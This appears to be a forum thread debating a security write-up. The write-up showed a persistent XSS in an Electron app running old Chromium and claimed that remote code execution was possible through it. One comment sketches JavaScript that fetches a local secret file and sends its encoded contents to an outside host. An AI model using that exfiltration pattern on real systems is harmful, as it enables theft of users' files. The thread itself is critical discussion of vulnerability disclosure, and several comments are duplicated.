He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
If you can fetch arbitrary URLs, and the contents of local files, you can trivially exfiltrate the latter with the former. Just fetch the local file, then fetch an URL that encodes the contents of the local file.
var text = fetch("/local/secret/file");
fetch("https://example.org/"+encode(text));
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
Are you saying he could alert it but not exfiltrate it?
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.